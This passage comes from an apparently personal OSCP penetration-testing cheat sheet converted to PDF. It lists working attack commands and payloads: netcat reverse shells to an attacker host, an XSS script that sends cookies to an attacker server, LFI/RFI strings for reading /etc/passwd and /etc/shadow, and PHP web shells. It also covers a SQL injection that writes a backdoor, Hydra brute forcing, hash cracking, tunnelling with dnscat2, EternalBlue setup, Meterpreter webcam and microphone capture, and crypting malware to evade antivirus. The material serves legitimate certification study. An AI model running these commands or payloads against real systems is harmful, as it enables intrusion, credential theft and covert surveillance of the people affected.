1447. cat `find / -name proof.txt -print`
1448.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1449. - Windows Privilege Escalation
1450. --------------------------------------------------------------------------------------------------------------------------
1451.
1452. - Windows Privilege Escalation resource
1453. http://www.fuzzysecurity.com/tutorials/16.html
1454.
1455. - Try the getsystem command using meterpreter - rarely works but is worth a try.
1456.
1457. `meterpreter > getsystem`
1458.
1459. - Metasploit Meterpreter Privilege Escalation Guide
1460. https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
1461.
1462. - Windows Server 2003 and IIS 6.0 WEBDAV Exploiting
1463. http://www.r00tsec.com/2011/09/exploiting-microsoft-iis-version-60.html
1464.
1466.
1467. cadavar http://$ip
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1477. msf exploit(handler) > set LHOST 1.2.3.4
1483.
1484. [*] Started reverse TCP handler on 1.2.3.4:443
1487. [*] Meterpreter session 1 opened (1.2.3.4:443 -> 1.2.3.5:1063) at 2017-09-25 13:10:55 -0700
1488.
1489. - Windows privledge escalation exploits are often written in Python. So, it is necessary to compile the using pyinstaller.py into
1494.
1495. - Windows Server 2003 and IIS 6.0 privledge escalation using impersonation:
1496.
1497. https://www.exploit-db.com/exploits/6705/
1498.
1499. https://github.com/Re4son/Churrasco
1500.
1501. c:\Inetpub>churrasco
1502. churrasco
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1504.
1505. c:\Inetpub>churrasco -d "net user /add <username> <password>"
1508.
1513.
1514. - Powershell Exploits - You may find that some Windows privledge escalation exploits are written in Powershell. You may not have an
interactive shell that allows you to enter the powershell prompt. Once the powershell script is uploaded to the server, here is a
quick one liner to run a powershell command from a basic (cmd.exe) shell:
1515.
1519.
1520.
1523.
1524. - Windows Run As - Switching users in linux is trival with the `SU` command. However, an equivalent command does not exist in
Windows. Here are 3 ways to run a command as a different user in Windows.
1525.
1526. - Sysinternals psexec is a handy tool for running a command on a remote or local server as a specific user, given you have
thier username and password. The following example creates a reverse shell from a windows server to our Kali box using netcat for
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1527.
1528. C:\>psexec64 \\COMPUTERNAME -u Test -p test -h "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"
1529.
1533.
1534. - Runas.exe is a handy windows tool that allows you to run a program as another user so long as you know thier password. The
following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Runas.exe:
1535.
1536. C:\>C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"
1539.
1540. - PowerShell can also be used to launch a process as another user. The following simple powershell script will run a reverse
1541.
1542. $username = '<username here>'
1547.
1548. Next run this script using powershell.exe:
1549.
1550. `powershell -ExecutionPolicy ByPass -command "& { . C:\Users\public\PowerShellRunAs.ps1; }"`
1551.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1552.
1553. - Windows Service Configuration Viewer - Check for misconfigurations
1554. in services that can lead to privilege escalation. You can replace
1555. the executable with your own and have windows execute whatever code
1559. scsiaccess.exe
1560. NT AUTHORITY\SYSTEM:(I)(F)
1561. BUILTIN\Administrators:(I)(F)
1562. BUILTIN\Users:(I)(RX)
1563. APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
1564. Everyone:(I)(F)
1565.
1567.
1568. root@kali:~\# cat useradd.c
1571. {
1572. int i;
1574. return 0;
1575. }
1576.
1577. i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c
1578.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1580. A common useful misconfiguration found in modern domain environments
1584.
1585. `net use z:\\dc01\SYSVOL`
1586.
1587. - Find the GPP file: Groups.xml
1588.
1596.
1597. `gpp-decrypt riBZpPtHOGtVk+SdLOmJ6xiNgFH6Gp45BoP3I6AnPgZ1IfxtgI67qqZfgh78kBZB`
1598.
1599. - Find and display the proof.txt or flag.txt - get the loot!
1600.
1605.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1608.
1609. - <span id="_pcjm0n4oppqx" class="anchor"><span id="_Toc480741817" class="anchor"></span></span>Client Attacks
1610. ------------------------------------------------------------------------------------------------------------
1611.
1612. - MS12-037- Internet Explorer 8 Fixed Col Span ID
1623.
1624. - Linux Client Shells
1625. [*http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/*](http://www.lanmaster53.com/2011/05/7-linux-
shells-using-built-in-tools/)
1626.
1634.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1635. - <span id="_n6fr3j21cp1m" class="anchor"><span id="_Toc480741818" class="anchor"></span></span>Web Attacks
1636. ---------------------------------------------------------------------------------------------------------
1637.
1639. webshag-gui
1640.
1643. ls -l /usr/share/webshells/
1644.
1645. - Generate a PHP backdoor (generate) protected with the given
1649.
1650. - Java Signed Applet Attack
1651.
1652. - HTTP / HTTPS Webserver Enumeration
1653.
1654. - OWASP Dirbuster
1655.
1660. https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1663.
1664. - Cross Site Scripting (XSS)
1668.
1669. - Browser Redirection and IFRAME Injection
1671. ="0"></iframe>
1672.
1675. new
1676. image().src="http://$ip/bogus.php?output="+document.cookie;
1677. </script>
1678. nc -nlvp 80
1679.
1682.
1683. - Local (LFI) and remote (RFI) file inclusion vulnerabilities are
1684. commonly found in poorly written PHP code.
1685.
1686. - fimap - There is a Python tool called fimap which can be
1690.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1691. - Gaining a shell from phpinfo()
1693. it’s usually possible to get a shell, if you don’t know the
1694. location of the phpinfo file fimap can probe for it, or you
1697. - For Local File Inclusions look for the include() function in PHP
1698. code.
1699. include("lang/".$\_COOKIE\['lang'\]);
1700. include($\_GET\['page'\].".php");
1701.
1704. http://$ip/?page=php://filter/convert.base64-encode/resource=index
1709.
1712. /proc/version
1713. /etc/profile
1714. /etc/passwd
1715. /etc/passwd
1716. /etc/shadow
1717. /root/.bash\_history
1718. /var/log/dmessage
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1719. /var/mail/root
1720. /var/spool/cron/crontabs/root
1721.
1724. %SYSTEMROOT%\\repair\\SAM
1725. %SYSTEMROOT%\\repair\\SAM
1726. %WINDIR%\\win.ini
1727. %SYSTEMDRIVE%\\boot.ini
1728. %WINDIR%\\Panther\\sysprep.inf
1729. %WINDIR%\\system32\\config\\AppEvent.Evt
1730.
1732. /etc/fstab
1733. /etc/master.passwd
1734. /etc/resolv.conf
1735. /etc/sudoers
1736. /etc/sysctl.conf
1737.
1739. [*http://$ip/index.php?page=/etc/passwd*](about:blank)
1740. [*http://$ip/index.php?file=../../../../etc/passwd*](about:blank)
1741.
1742. - LFI - Download passwords file with filter evasion
1743. [*http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd*](about:blank)
1744.
1745. - Local File Inclusion - In versions of PHP below 5.3 we can
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1747. GET
1748. /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00
1749.
1750. - Contaminating Log Files `<?php echo shell_exec($_GET['cmd']);?>`
1751.
1752. - For a Remote File Inclusion look for php code that is not sanitized and passed to the PHP include function and the php.ini
1753. file must be configured to allow remote files
1754.
1755. */etc/php5/cgi/php.ini* - "allow_url_fopen" and "allow_url_include" both set to "on"
1756.
1757. `include($_REQUEST["file"].".php");`
1758.
1759. - Remote File Inclusion
1760.
1761. `http://192.168.11.35/addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt `
1762.
1763. `<?php echo shell\_exec("ipconfig");?>`
1764.
1765. - <span id="_mgu7e3u7svak" class="anchor"><span id="_Toc480741820" class="anchor"></span></span>Database Vulnerabilities
1766. ----------------------------------------------------------------------------------------------------------------------
1767.
1768. - Grab password hashes from a web application mysql database called “Users” - once you have the MySQL root username and
password
1769.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1774.
1775. - Authentication Bypass
1776.
1777. name='wronguser' or 1=1;
1778. name='wronguser' or 1=1 LIMIT 1;
1779.
1783.
1784. Verbose error message?
1785.
1793.
1794. Current user being used for the database connection:
1795.
1796. `http://$ip/comment.php?id=738 union all select 1,2,3,4,user(),6 `
1797.
1798. Enumerate database tables and column structures
1799.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1802. Target the users table in the database
1803.
1804. `http://$ip/comment.php?id=738 union all select 1,2,3,4,column_name,6 FROM information_schema.columns where
table_name='users' `
1805.
1809.
1810. Create a backdoor
1811.
1812. `http://$ip/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE
'c:/xampp/htdocs/backdoor.php'`
1813.
1814.
1818.
1819. `sqlmap -u http://$ip --crawl=1`
1820.
1821. `sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3`
1822.
1823.
1824. - SQLMap Search for databases against a suspected GET SQL Injection
1825.
1826. `sqlmap –u http://$ip/blog/index.php?search –dbs`
1827.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1828. - SQLMap dump tables from database oscommerce at GET SQL injection
1829.
1830. `sqlmap –u http://$ip/blog/index.php?search= –dbs –D oscommerce –tables –dumps `
1831.
1835.
1836. - SQLMap Post Username parameter
1837.
1838. `sqlmap -u http://$ip/login.php --method=POST --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3 --level=5
--dbms=MySQL --dump-all`
1839.
1840. - SQL Map OS Shell
1841.
1842. `sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --osshell `
1843.
1844. `sqlmap -u http://$ip/login.php --method=POST --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3 --level=5
--dbms=MySQL --os-shell`
1845.
1846. - Automated sqlmap scan
1847.
1848. `sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-
read="/var/www/blah.php"`
1849.
1850. - Targeted sqlmap scan
1851.
1852. `sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump`
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1853.
1854. - Scan url for union + error based injection with mysql backend and use a random user agent + database dump
1855.
1859.
1860. - Sqlmap check form for injection
1861.
1862. `sqlmap -o -u "http://$ip/vuln-form" --forms -D database-name -T users --dump`
1863.
1864. - Enumerate databases
1865.
1873.
1874. `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump `
1875.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1881.
1882. `sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs `
1883.
1884. - Get OS shell
1885.
1893.
1894. `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"`
1895.
1896. - Use Tor Socks5 proxy
1897.
1898. `sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs`
1899.
1900.
1901. - **NoSQLMap Examples**
1902. You may encounter NoSQL instances like MongoDB in your OSCP journies (`/cgi-bin/mongo/2.2.3/dbparse.py`). NoSQLMap can help
you to automate NoSQLDatabase enumeration.
1903.
1904. - NoSQLMap Installation
1905.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1908. ls
1913.
1914. - Password Attacks
1915. --------------------------------------------------------------------------------------------------------------
1916.
1917. - AES Decryption
1918. http://aesencryption.net/
1919.
1920. - Convert multiple webpages into a word list
1921. for x in 'index' 'about' 'post' 'contact' ; do curl
1922. http://$ip/$x.html | html2markdown | tr -s ' ' '\\n' >>
1930. - CIRT
1931. [*http://www.cirt.net/passwords*](http://www.cirt.net/passwords)
1932.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1936. - [*http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php*]
(http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php)
1937.
1938. - Virus.org
1939. [*http://www.virus.org/default-password/*](http://www.virus.org/default-password/)
1940.
1941. - Default Password
1942. [*http://www.defaultpassword.com/*](http://www.defaultpassword.com/)
1943.
1944. - Brute Force
1945.
1946. - Nmap Brute forcing Scripts
1947. [*https://nmap.org/nsedoc/categories/brute.html*](https://nmap.org/nsedoc/categories/brute.html)
1948.
1952.
1953. - MySQL nmap brute force attack
1954. nmap --script=mysql-brute $ip
1955.
1959. cd /usr/share/wordlists
1960.
1961. - Key-space Brute Force
1962.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1963. - crunch 6 6 0123456789ABCDEF -o crunch1.txt
1964.
1965. - crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
1966.
1967. - crunch 8 8 -t ,@@^^%%%
1968.
1976.
1977. - Windows Credential Editor (WCE)
1978.
1983.
1984. - Mimikatz
1985.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1991. `meterpreter> load mimikatz
1992. meterpreter> help mimikatz
2010.
2011. - Medusa, initiated against an htaccess protected web
2012. directory
2017. - ncrack (from the makers of nmap) can brute force RDP
2018. `ncrack -vv --user offsec -P password-file.txt rdp://$ip`
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2019.
2020. - Hydra
2021.
2022. - Hydra brute force against SNMP
2027.
2028. - Hydra SSH using list of users and passwords
2029. `hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh`
2030.
2031. - Hydra SSH using a known password and a username list
2032. `hydra -v -V -u -L users.txt -p "<known password>" -t 1 -u $ip ssh`
2033.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2047. `hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip`
2048.
2049. - Hydra brute force a Wordpress admin login
2053.
2054. - <span id="_bnmnt83v58wk" class="anchor"><span id="_Toc480741822" class="anchor"></span></span>Password Hash Attacks
2055. -------------------------------------------------------------------------------------------------------------------
2056.
2057. - Online Password Cracking
2058. [*https://crackstation.net/*](https://crackstation.net/)
2059.
2060. - Hashcat
2061. Needed to install new drivers to get my GPU Cracking to work on the Kali linux VM and I also had to use the --force parameter.
2062. apt-get install libhwloc-dev ocl-icd-dev ocl-icd-opencl-dev
2063. and
2064. apt-get install pocl-opencl-icd
2065.
2066. Cracking Linux Hashes - /etc/shadow file
2067. ```
2068. 500 | md5crypt $1$, MD5(Unix) | Operating-Systems
2069. 3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2074. ```
2075. 3000 | LM | Operating-Systems
2076. 1000 | NTLM | Operating-Systems
2077. ```
2078. Cracking Common Application Hashes
2079. ```
2087. ```
2088.
2089. Create a .hash file with all the hashes you want to crack
2090. puthasheshere.hash:
2091. ```
2092. $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/
2093. ```
2094.
2095. Hashcat example cracking Linux md5crypt passwords $1$ using rockyou:
2096.
2100.
2101. Wordpress clear text: test
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2102.
2103. Hashcat example cracking Wordpress passwords using rockyou:
2104.
2105. `hashcat --force -m 400 -a 0 -o found1.txt --remove wphash.hash /usr/share/wordlists/rockyou.txt`
2106.
2111.
2112. `hash-identifier`
2113.
2124.
2125. - `john --rules --wordlist=/usr/share/wordlists/rockyou.txt`
2126.
2127. - `john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt`
2128.
2129. - JTR forced descrypt cracking with wordlist
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2130.
2134.
2135. `john --format=descrypt hash --show`
2136.
2137. - Passing the Hash in Windows
2138.
2139. - Use Metasploit to exploit one of the SMB servers in the labs.
2140. Dump the password hashes and attempt a pass-the-hash attack
2144.
2145. `pth-winexe -U administrator //$ip cmd`
2146.
2147. <span id="_6nmbgmpltwon" class="anchor"><span id="_Toc480741823" class="anchor"></span></span>Networking, Pivoting and Tunneling
2148. ================================================================================================================================
2149.
2150. - Port Forwarding - accept traffic on a given IP address and port and
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2158.
2159. - SSH Local Port Forwarding: supports bi-directional communication
2160. channels
2161.
2162. - `ssh <gateway> -L <local port to listen>:<remote
2163. host>:<remote port>`
2164.
2165. - SSH Remote Port Forwarding: Suitable for popping a remote shell on
2166. an internal non routable network
2167.
2172. attacking box to tunnel ALL incoming traffic to ANY host in the DMZ
2173. network on ANY PORT
2174.
2182.
2183. `ssh -f -N -T -R22222:localhost:22 yourpublichost.example.com`
2184. `ssh -f -N -R 2222:<local host>:22 root@<remote host>`
2185.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2186. - Create a Dynamic application-level port forward on 8080 thru
2187. 2222
2188.
2189. `ssh -f -N -D <local host>:8080 -p 2222 hax0r@<remote host>`
2190.
2191. - Leverage the SSH SOCKS server to perform Nmap scan on network
2195.
2196. - HTTP Tunneling
2197.
2198. `nc -vvn $ip 8888`
2199.
2200. - Traffic Encapsulation - Bypassing deep packet inspection
2201.
2209. network
2210.
2211. - Tunnel on port 22
2212.
2213. `plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>`
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2214.
2219. - Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel
2220. (bypass deep packet inspection)
2221.
2222. - Windows machine add required firewall rules without prompting the user
2223.
2224. - `netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes`
2225.
2226. - `netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000`
2227.
2228. - `netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080`
2229.
2230. - `netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079`
2231.
2232. - Start the http tunnel client
2233.
2234. `httptunnel_client.exe`
2235.
2239.
2240. - VLAN Hopping
2241.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2242. - `git clone https://github.com/nccgroup/vlan-hopping.git
2246.
2247. - VPN Hacking
2248.
2256.
2257. `pip install pyip`
2258.
2259. `git clone https://github.com/SpiderLabs/ikeforce.git `
2260.
2261. Perform IKE VPN enumeration with IKEForce:
2262.
2266.
2267. `./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1 `
2268. Use ike-scan to capture the PSK hash:
2269.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2270. `ike-scan
2271. ike-scan TARGET-IP
2272. ike-scan -A TARGET-IP
2287.
2288. `nmap –Pn -sV -p 1723 TARGET(S) `
2289. PPTP Dictionary Attack
2290.
2291. `thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst`
2292.
2293. - Port Forwarding/Redirection
2294.
2295. - PuTTY Link tunnel - SSH Tunneling
2296.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2298.
2299. `plink.exe -P 22 -l root -pw "1337" -R 445:<local host>:445 <remote host>`
2300.
2301. - SSH Pivoting
2302.
2303. - SSH pivoting from one network to another:
2304.
2305. `ssh -D <local host>:1010 -p 22 user@<remote host>`
2306.
2310.
2311. - Attacking Machine Installation:
2312.
2313. `apt-get update
2317. cd dnscat2/server
2318. bundle install`
2319.
2320. - Run dnscat2:
2321.
2322. `ruby ./dnscat2.rb
2323. dnscat2> New session established: 1422
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2326. - Target Machine:
2327. https://downloads.skullsecurity.org/dnscat2/
2328. https://github.com/lukebaggett/dnscat2-powershell/
2329.
2330. `dnscat --host <dnscat server ip>`
2331.
2332. <span id="_ujpvtdpc9i67" class="anchor"><span id="_Toc480741824" class="anchor"></span></span>The Metasploit Framework
2333. ======================================================================================================================
2334.
2335. - See [*Metasploit Unleashed
2336. Course*](https://www.offensive-security.com/metasploit-unleashed/)
2337. in the Essentials
2338.
2339. - Search for exploits using Metasploit GitHub framework source code:
2340. [*https://github.com/rapid7/metasploit-framework*](https://github.com/rapid7/metasploit-framework)
2344.
2345. - MetaSploit requires Postfresql
2346.
2347. `systemctl start postgresql`
2348.
2349. - To enable Postgresql on startup
2350.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2354.
2355. - Start metasploit
2356.
2357. `msfconsole `
2358.
2359. `msfconsole -q`
2360.
2368.
2369. - Use a module
2370.
2378.
2379. `info`
2380.
2381. - Show the configuration parameters for a module
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2382.
2383. `show options`
2384.
2392. `run`
2393.
2394. - Execute an Exploit
2395.
2396. `exploit`
2397.
2398. - Search for a module
2399.
2400. `search type:auxiliary login`
2401.
2405.
2406. `hosts`
2407.
2408. - Scan for hosts and store them in the MSF database
2409.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2410. `db_nmap`
2411.
2415.
2416. - Leverage MSF database to scan SMB ports (auto-completed rhosts)
2417.
2418. `services -p 443 --rhosts`
2419.
2420. - Staged and Non-staged
2421.
course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in
Metasploit EternalBlue module. I found that the elevenpaths version works much more relabily. Here are the instructions to install
it taken from the following YouTube video:
2429. https://www.youtube.com/watch?v=4OHLor9VaRI
2430.
2431.
2432. 1. First step is to configure the Kali to work with wine 32bit
2433.
2434. `dpkg --add-architecture i386 && apt-get update && apt-get install wine32
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2435. rm -r ~/.wine
2440. https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
2441.
2442. 3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb
2443.
2444. 4. Start metasploit console
2445.
2446.
2447. I found that using spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.
2448.
2449.
2457.
2458.
2459. - Experimenting with Meterpreter
2460.
2461. - Get system information from Meterpreter Shell
2462.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2463. `sysinfo`
2464.
2465. - Get user id from Meterpreter Shell
2466.
2467. `getuid`
2468.
2469. - Search for a file
2470.
2471. `search -f *pass*.txt`
2472.
2480.
2481. - Invoke a command shell from Meterpreter Shell
2482.
2483. `shell`
2484.
2485. - Exit the meterpreter shell
2486.
2487. `exit`
2488.
2489. - Metasploit Exploit Multi Handler
2490.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2491. - multi/handler to accept an incoming reverse\_https\_meterpreter
2492.
2493. `payload
2504. cd ~/.msf4/modules/exploits/linux/misc
2505. cp
2506. /usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb
2507. ./crossfire.rb
2508. nano crossfire.rb`
2509.
2510. - Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
2511.
2512. - `download` Download a file or directory
2513. `upload` Upload a file or directory
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2519. `record_mic` Record audio from the default microphone for X seconds
2520. `webcam_snap` Take a snapshot from the specified webcam
2528. `background`
2529.
2530. <span id="_51btodqc88s2" class="anchor"><span id="_Toc480741825" class="anchor"></span></span>Bypassing Antivirus Software
2531. ===========================================================================================================================
2532.
2533. - Crypting Known Malware with Software Protectors
2534.
2535. - One such open source crypter, called Hyperion
2536.
2537. `cp /usr/share/windows-binaries/Hyperion-1.0.zip
2541. cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll .
2542. cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll .
2543. wine hyperion.exe ../backdoor.exe ../crypted.exe`
2544.
2545.
2546. OSCP Course Review
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2547. ================================================================================================================
2548.
2549. - Offensive Security’s PWB and OSCP — My Experience
2550. [*http://www.securitysift.com/offsec-pwb-oscp/*](http://www.securitysift.com/offsec-pwb-oscp/)
2551.
2552. - OSCP Journey
2553. [*https://scriptkidd1e.wordpress.com/oscp-journey/*](https://scriptkidd1e.wordpress.com/oscp-journey/)
2554.
2561.
2562. <span id="_pxmpirqr11x0" class="anchor"><span id="_Toc480741798" class="anchor"></span></span>OSCP Inspired VMs and Walkthroughs
2563. ================================================================================================================================
2564.
2565. - [*https://www.vulnhub.com/*](https://www.vulnhub.com/)
2566. [*https://www.root-me.org/*](https://www.root-me.org/)
2567.
2568. - Walk through of Tr0ll-1 - Inspired by on the Trolling found in the
2569. OSCP exam
2570. [*https://highon.coffee/blog/tr0ll-1-walkthrough/*](https://highon.coffee/blog/tr0ll-1-walkthrough/)
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2573. Taming the troll - walkthrough
2574. [*https://leonjza.github.io/blog/2014/08/15/taming-the-troll/*](https://leonjza.github.io/blog/2014/08/15/taming-the-troll/)
2575. Troll download on Vuln Hub
2576. [*https://www.vulnhub.com/entry/tr0ll-1,100/*](https://www.vulnhub.com/entry/tr0ll-1,100/)
2577.
2578. - Sickos - Walkthrough:
2579. [*https://highon.coffee/blog/sickos-1-walkthrough/*](https://highon.coffee/blog/sickos-1-walkthrough/)
2582.
2583. - Lord of the Root Walk Through
2584. [*https://highon.coffee/blog/lord-of-the-root-walkthrough/*](https://highon.coffee/blog/lord-of-the-root-walkthrough/)
2585. Lord Of The Root: 1.0.1 - Inspired by OSCP
2586. [*https://www.vulnhub.com/series/lord-of-the-root,67/*](https://www.vulnhub.com/series/lord-of-the-root,67/)
2587.
2588. - Tr0ll-2 Walk Through
2589. [*https://leonjza.github.io/blog/2014/10/10/another-troll-tamed-solving-troll-2/*]
(https://leonjza.github.io/blog/2014/10/10/another-troll-tamed-solving-troll-2/)
2590. Tr0ll-2
2591. [*https://www.vulnhub.com/entry/tr0ll-2,107/*](https://www.vulnhub.com/entry/tr0ll-2,107/)
2592.
2593. <span id="_kfwx4om2dsj4" class="anchor"><span id="_Toc480741799" class="anchor"></span></span>Cheat Sheets
2594. ==========================================================================================================
2595.
2596. - Penetration Tools Cheat Sheet
2597. [*https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/*](https://highon.coffee/blog/penetration-testing-tools-cheat-
sheet/)
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2598.
2599. - Pen Testing Bookmarks
2600. [*https://github.com/kurobeats/pentest-bookmarks/blob/master/BookmarksList.md*](https://github.com/kurobeats/pentest-
bookmarks/blob/master/BookmarksList.md)
2601.
2602. - OSCP Cheatsheets
2603. [*https://github.com/slyth11907/Cheatsheets*](https://github.com/slyth11907/Cheatsheets)
2604.
2605. - CEH Cheatsheet
2606. [*https://scadahacker.com/library/Documents/Cheat\_Sheets/Hacking%20-%20CEH%20Cheat%20Sheet%20Exercises.pdf*]
(https://scadahacker.com/library/Documents/Cheat_Sheets/Hacking%20-%20CEH%20Cheat%20Sheet%20Exercises.pdf)
2607.
2608. - Net Bios Scan Cheat Sheet
2609. [*https://highon.coffee/blog/nbtscan-cheat-sheet/*](https://highon.coffee/blog/nbtscan-cheat-sheet/)
2610.
2611. - Reverse Shell Cheat Sheet
2612. [*https://highon.coffee/blog/reverse-shell-cheat-sheet/*](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
2613.
2614. - NMap Cheat Sheet
2615. [*https://highon.coffee/blog/nmap-cheat-sheet/*](https://highon.coffee/blog/nmap-cheat-sheet/)
2616.
2617. - Linux Commands Cheat Sheet
2618. [*https://highon.coffee/blog/linux-commands-cheat-sheet/*](https://highon.coffee/blog/linux-commands-cheat-sheet/)
2619.
2620. - Security Hardening CentO 7
2621. [*https://highon.coffee/blog/security-harden-centos-7/*](https://highon.coffee/blog/security-harden-centos-7/)
2622.
2623. - MetaSploit Cheatsheet
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2624. [*https://www.sans.org/security-resources/sec560/misc\_tools\_sheet\_v1.pdf*](https://www.sans.org/security-
resources/sec560/misc_tools_sheet_v1.pdf)
2625.
2626. - Google Hacking Database:
2627. [*https://www.exploit-db.com/google-hacking-database/*](https://www.exploit-db.com/google-hacking-database/)
2628.
2629. - Windows Assembly Language Mega Primer
2630. [*http://www.securitytube.net/groups?operation=view&groupId=6*](http://www.securitytube.net/groups?operation=view&groupId=6)
2631.
2632. - Linux Assembly Language Mega Primer
2633. [*http://www.securitytube.net/groups?operation=view&groupId=5*](http://www.securitytube.net/groups?operation=view&groupId=5)
2634.
2637.
2638. - A bit dated but most is still relevant
2639.
2640. [*http://hackingandsecurity.blogspot.com/2016/04/oscp-related-notes.html*](http://hackingandsecurity.blogspot.com/2016/04/oscp-
related-notes.html)
2641.
2642. - NetCat
2643.
2644. - [*http://www.sans.org/security-resources/sec560/netcat\_cheat\_sheet\_v1.pdf*](http://www.sans.org/security-
resources/sec560/netcat_cheat_sheet_v1.pdf)
2645.
2646. - [*http://www.secguru.com/files/cheatsheet/nessusNMAPcheatSheet.pdf*]
(http://www.secguru.com/files/cheatsheet/nessusNMAPcheatSheet.pdf)
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2647.
2648. - [*http://sbdtools.googlecode.com/files/hping3\_cheatsheet\_v1.0-ENG.pdf*]
